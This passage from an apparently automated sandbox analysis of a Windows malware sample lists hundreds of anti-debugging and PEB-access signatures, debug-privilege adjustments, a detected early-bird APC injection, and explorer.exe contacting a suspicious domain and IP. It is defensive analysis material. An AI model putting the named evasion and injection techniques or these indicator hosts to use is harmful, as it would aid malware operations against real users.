                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A2F70 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A2F70 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A2F70 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B548F6A mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B50FF10 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B50FF10 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AC707 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AC707 mov ecx, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AC707 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B52DF1D mov ecx, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B52DF1D mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A4710 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49F716 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B474F2E mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B474F2E mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49B73D mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49B73D mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B476730 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B476730 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B476730 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AE730 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AD7CA mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AD7CA mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B473FC5 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B473FC5 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B473FC5 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A37EB mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A37EB mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A37EB mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A37EB mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A37EB mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A37EB mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A37EB mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B37F5 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B472FB0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B472FB0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B472FB0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B472FB0 mov ecx, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B472FB0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B472FB0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B472FB0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B472FB0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B472FB0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B472FB0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B472FB0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B506652 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B48766D mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4ACE6C mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4ACE6C mov ecx, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B52F674 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4FAE60 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4FAE60 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4FAE60 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4FAE60 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A3E70 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B502E14 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47C600 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47C600 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47C600 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B0E21 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4F5623 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4F5623 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4F5623 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4F5623 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4F5623 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4F5623 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4F5623 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4F5623 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4F5623 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B52FE3F mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AC63D mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47A63B mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47A63B mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B548ED6 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A36CC mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A16E0 mov ecx, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4876E2 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B3EE4 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B3EE4 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B3EE4 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B473E80 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B473E80 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4ADE9E mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4ADE9E mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4ADE9E mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4F46A7 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B502EA3 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B3D43 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47354C mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47354C mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B523D40 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B528D47 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B497D50 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49C577 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49C577 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B533518 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B533518 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B533518 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47F51D mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B548D34 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A1520 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A1520 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A1520 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A1520 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A1520 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A4D3B mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A4D3B mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A4D3B mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47AD30 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B52FDD3 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4715C1 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B528DF1 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A95EC mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4795F0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4795F0 mov ecx, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B53B581 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B53B581 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B53B581 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B53B581 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B473591 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A35A1 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A1DB5 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A1DB5 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A1DB5 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B548450 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B548C75 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49746D mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AAC7B mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AAC7B mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AAC7B mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AAC7B mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AAC7B mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AAC7B mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AAC7B mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AAC7B mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AAC7B mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AAC7B mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AAC7B mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B5C70 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B48FC77 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B48FC77 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B48FC77 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B48FC77 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B548C14 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B48FC01 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B48FC01 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B48FC01 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B48FC01 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B531C06 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B531C06 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B531C06 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B531C06 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B531C06 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B531C06 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B531C06 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B531C06 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B531C06 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B531C06 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B531C06 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B531C06 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B531C06 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B531C06 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B54740D mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B54740D mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B54740D mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4ABC2C mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B492430 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B492430 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B474439 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B548CD6 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4ACCC0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4ACCC0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4ACCC0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4ACCC0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B472CDB mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B5314FB mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B52D4E1 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B534496 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B534496 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B534496 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B534496 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B534496 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B534496 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B534496 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B534496 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B534496 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B534496 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B534496 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B534496 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B534496 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B471480 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47649B mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47649B mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47EC9B mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47EC9B mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B549CB3 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B474CB0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AD4B0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\B084.exeCode function: 33_2_02B60D90 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\B084.exeCode function: 33_2_02B6092B mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeCode function: 34_2_00416842 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeCode function: 34_2_00412AB1 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\B084.exeProcess queried: DebugPort
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeCode function: 0_2_00420900 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeCode function: 34_2_00401F20 GetUserNameW,GetUserNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetUserNameW,LookupAccountNameW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LookupAccountNameW,ConvertSidToStringSidW,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A6B90 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4B99A0 ZwCreateSection,LdrInitializeThunk,
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeMemory allocated: page read and write | page guard
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeCode function: 0_2_00420900 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeCode function: 0_2_0041D190 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeCode function: 17_2_0041CC60 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeCode function: 17_2_004203D0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeCode function: 34_2_00410E58 SetUnhandledExceptionFilter,
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeCode function: 34_2_004110A3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeCode function: 34_2_00415393 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeCode function: 34_2_00410CF3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                        HIPS / PFW / Operating System Protection Evasion:

                        barindex
                        Early bird code injection technique detectedShow sources
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeProcess created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\977B.exe
                        System process connects to network (likely due to code injection or exploit)Show sources
                        Source: C:\Windows\explorer.exeDomain query: xacokuo8.top
                        Source: C:\Windows\explorer.exeNetwork Connect: 216.128.137.31 80
